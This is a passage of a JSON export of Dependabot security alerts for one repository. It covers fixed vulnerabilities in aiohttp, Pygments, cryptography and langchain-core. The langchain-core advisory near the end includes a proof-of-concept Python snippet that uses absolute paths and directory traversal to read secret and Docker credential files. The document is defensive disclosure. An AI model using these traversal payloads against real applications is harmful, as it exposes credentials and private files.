3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/48","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/48","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":47,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-966j-vmvw-g2g9","cve_id":"CVE-2026-34518","summary":"AIOHTTP leaks Cookie and Proxy-Authorization headers on cross-origin redirect","description":"### Summary\n\nWhen following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.\n\n### Impact\n\nThe Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6","severity":"low","identifiers":[{"value":"GHSA-966j-vmvw-g2g9","type":"GHSA"},{"value":"CVE-2026-34518","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34518"},{"url":"https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-966j-vmvw-g2g9"}],"published_at":"2026-04-01T21:47:46Z","updated_at":"2026-04-24T20:33:20Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00041,"percentile":0.12317},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/47","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/47","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":46,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3wq7-rqq7-wx6j","cve_id":"CVE-2026-34517","summary":"AIOHTTP has late size enforcement for non-file multipart fields causes memory DoS","description":"### Summary\n\nFor some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.\n\n### Impact\n\nIf an application uses `Request.post()` an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145","severity":"low","identifiers":[{"value":"GHSA-3wq7-rqq7-wx6j","type":"GHSA"},{"value":"CVE-2026-34517","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34517"},{"url":"https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-3wq7-rqq7-wx6j"}],"published_at":"2026-04-01T21:47:07Z","updated_at":"2026-04-01T21:47:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17179},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/46","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/46","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":45,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-m5qp-6w8w-w647","cve_id":"CVE-2026-34516","summary":"AIOHTTP has a Multipart Header Size Bypass","description":"### Summary\n\nA response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.\n\n### Impact\n\nMultipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. However, other restrictions in place limit the impact of this vulnerability.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f","severity":"medium","identifiers":[{"value":"GHSA-m5qp-6w8w-w647","type":"GHSA"},{"value":"CVE-2026-34516","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34516"},{"url":"https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-m5qp-6w8w-w647"}],"published_at":"2026-04-01T21:43:07Z","updated_at":"2026-04-06T23:12:07Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/45","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/45","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":44,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-p998-jp59-783m","cve_id":"CVE-2026-34515","summary":"AIOHTTP affected by UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows","description":"### Summary\n\nOn Windows the static resource handler may expose information about a NTLMv2 remote path.\n\n### Impact\n\nIf an application is running on Windows, and using aiohttp's static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user's credentials from there.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d","severity":"medium","identifiers":[{"value":"GHSA-p998-jp59-783m","type":"GHSA"},{"value":"CVE-2026-34515","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"},{"url":"https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34515"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-p998-jp59-783m"}],"published_at":"2026-04-01T21:26:36Z","updated_at":"2026-04-06T16:47:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00066,"percentile":0.20264},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"},{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/44","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/44","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":43,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2vrm-gr82-f7m5","cve_id":"CVE-2026-34514","summary":"AIOHTTP has CRLF injection through multipart part content type header construction","description":"### Summary\n\nAn attacker who controls the `content_type` parameter in aiohttp could use this to inject extra headers or similar exploits.\n\n### Impact\n\nIf an application allows untrusted data to be used for the multipart `content_type` parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06","severity":"low","identifiers":[{"value":"GHSA-2vrm-gr82-f7m5","type":"GHSA"},{"value":"CVE-2026-34514","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"},{"url":"https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34514"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-2vrm-gr82-f7m5"}],"published_at":"2026-04-01T21:20:06Z","updated_at":"2026-04-06T16:46:52Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/43","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/43","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":42,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-hcc4-c3v8-rx92","cve_id":"CVE-2026-34513","summary":"AIOHTTP Affected by Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector","description":"### Summary\n\nAn unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.\n\n### Impact\n\nIf an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98","severity":"low","identifiers":[{"value":"GHSA-hcc4-c3v8-rx92","type":"GHSA"},{"value":"CVE-2026-34513","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"},{"url":"https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34513"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-hcc4-c3v8-rx92"}],"published_at":"2026-04-01T21:19:22Z","updated_at":"2026-04-06T16:46:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/42","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/42","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":41,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-w2fm-2cpv-w7v5","cve_id":"CVE-2026-22815","summary":"aiohttp allows unlimited trailer headers, leading to possible uncapped memory usage","description":"### Summary\n\nInsufficient restrictions in header/trailer handling could cause uncapped memory usage.\n\n### Impact\n\nAn application could cause memory exhaustion when receiving an attacker controlled request or response. A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36","severity":"medium","identifiers":[{"value":"GHSA-w2fm-2cpv-w7v5","type":"GHSA"},{"value":"CVE-2026-22815","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"},{"url":"https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22815"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-w2fm-2cpv-w7v5"}],"published_at":"2026-04-01T19:45:17Z","updated_at":"2026-04-06T16:46:37Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":6.9}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/41","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/41","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":40,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"Pygments"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-5239-wwwm-4pmq","cve_id":"CVE-2026-4539","summary":"Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching","description":"A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","severity":"low","identifiers":[{"value":"GHSA-5239-wwwm-4pmq","type":"GHSA"},{"value":"CVE-2026-4539","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-4539"},{"url":"https://github.com/pygments/pygments/issues/3058"},{"url":"https://github.com/pygments/pygments"},{"url":"https://vuldb.com/?ctiid.352327"},{"url":"https://vuldb.com/?id.352327"},{"url":"https://vuldb.com/?submit.774685"},{"url":"https://github.com/pygments/pygments/pull/3064"},{"url":"https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc"},{"url":"https://github.com/pygments/pygments/releases/tag/2.20.0"},{"url":"https://github.com/advisories/GHSA-5239-wwwm-4pmq"}],"published_at":"2026-03-22T06:30:15Z","updated_at":"2026-03-30T14:40:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","score":1.9}},"epss":{"percentage":7.0e-05,"percentile":0.00646},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-1333","name":"Inefficient Regular Expression Complexity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/40","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/40","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":39,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-m959-cc7f-wv43","cve_id":"CVE-2026-34073","summary":"cryptography has incomplete DNS name constraint enforcement on peer names","description":"## Summary\n\nIn versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the \"peer name\" presented during each validation. Consequently, cryptography would allow a peer named `bar.example.com` to validate against a wildcard leaf certificate for `*.example.com`, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for `bar.example.com`.\n\nThis behavior resulted from a gap between RFC 5280 (which defines Name Constraint semantics) and RFC 9525 (which defines service identity semantics): put together, neither states definitively whether Name Constraints should be applied to peer names. To close this gap, cryptography now conservatively rejects any validation where the peer name would be rejected by a name constraint if it were a SAN instead.\n\nIn practice, exploitation of this bypass requires an uncommon X.509 topology, one that the Web PKI avoids because it exhibits these kinds of problems. Consequently, we consider this a medium-to-low impact severity.\n\nSee CVE-2025-61727 for a similar bypass in Go's `crypto/x509`.\n\n## Remediation\n\nUsers should upgrade to 46.0.6 or newer. \n\n## Attribution\n\nReporter: @1seal","severity":"low","identifiers":[{"value":"GHSA-m959-cc7f-wv43","type":"GHSA"},{"value":"CVE-2026-34073","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34073"},{"url":"https://github.com/advisories/GHSA-m959-cc7f-wv43"}],"published_at":"2026-03-27T19:56:21Z","updated_at":"2026-04-06T23:13:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":1.7}},"epss":{"percentage":9.0e-05,"percentile":0.0084},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-295","name":"Improper Certificate Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/39","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/39","created_at":"2026-04-30T08:37:36Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":38,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-qh6h-p6c9-ff54","cve_id":"CVE-2026-34070","summary":"LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions","description":"## Summary\n\nMultiple functions in `langchain_core.prompts.loading` read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to `load_prompt()` or `load_prompt_from_config()`, an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (`.txt` for templates, `.json`/`.yaml` for examples).\n\n**Note:** The affected functions (`load_prompt`, `load_prompt_from_config`, and the `.save()` method on prompt classes) are undocumented legacy APIs. They are superseded by the `dumpd`/`dumps`/`load`/`loads` serialization APIs in `langchain_core.load`, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.\n\n## Affected component\n\n**Package:** `langchain-core`\n**File:** `langchain_core/prompts/loading.py`\n**Affected functions:** `_load_template()`, `_load_examples()`, `_load_few_shot_prompt()`\n\n## Severity\n\n**High** \n\nThe score reflects the file-extension constraints that limit which files can be read.\n\n## Vulnerable code paths\n\n| Config key | Loaded by | Readable extensions |\n|---|---|---|\n| `template_path`, `suffix_path`, `prefix_path` | `_load_template()` | `.txt` |\n| `examples` (when string) | `_load_examples()` | `.json`, `.yaml`, `.yml` |\n| `example_prompt_path` | `_load_few_shot_prompt()` | `.json`, `.yaml`, `.yml` |\n\nNone of these code paths validated the supplied path against absolute path injection or `..` traversal sequences before reading from disk.\n\n## Impact\n\nAn attacker who controls or influences the prompt configuration dict can read files outside the intended directory:\n\n- **`.txt` files:** cloud-mounted secrets (`/mnt/secrets/api_key.txt`), `requirements.txt`, internal system prompts\n- **`.json`/`.yaml` files:** cloud credentials (`~/.docker/config.json`, `~/.azure/accessTokens.json`), Kubernetes manifests, CI/CD configs, application settings\n\nThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose `load_prompt_from_config()`.\n\n## Proof of concept\n\n```python\nfrom langchain_core.prompts.loading import load_prompt_from_config\n\n# Reads /tmp/secret.txt via absolute path injection\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"/tmp/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\nprint(prompt.template) # file contents disclosed\n\n# Reads ../../etc/secret.txt via directory traversal\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"../../etc/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\n\n# Reads arbitrary .json via few-shot examples\nconfig = {\n \"_type\": \"few_shot\",\n \"examples\": \"../../../../.docker/config.json\",\n \"example_prompt\": {\n \"_type\": \"prompt\",\n \"input_variables\": [\"input\", \"output\"],\n \"template\": \"{input}: {output}\",\n },\n \"prefix\": \"\",\n \"suffix\": \"{query}\",\n \"input_variables\": [\"query\"],\n}\nprompt = load_prompt_from_config(config)\n```\n\n## Mitigation\n\n**Update `langchain-core` to >= 1.2.22.**\n\nThe fix adds path validation that rejects absolute paths and `..` traversal sequences by default. An `allow_dangerous_paths=True` keyword argument is available on `load_prompt()` and `load_prompt_from_config()` for trusted inputs.\n\nAs described above, these legacy APIs have been formally deprecated. Users should migrate to `dumpd`/`dumps`/`load`/`loads` from `langchain_core.load`.\n\n## Credit\n\n- [jiayuqi7813](https://github.com/jiayuqi7813) reporter\n- [VladimirEliTokarev](https://github.com/VladimirEliTokarev) reporter\n- [Rickidevs](https://github.com/Rickidevs) reporter\n- Kenneth Cox (cczine@gmail.com) 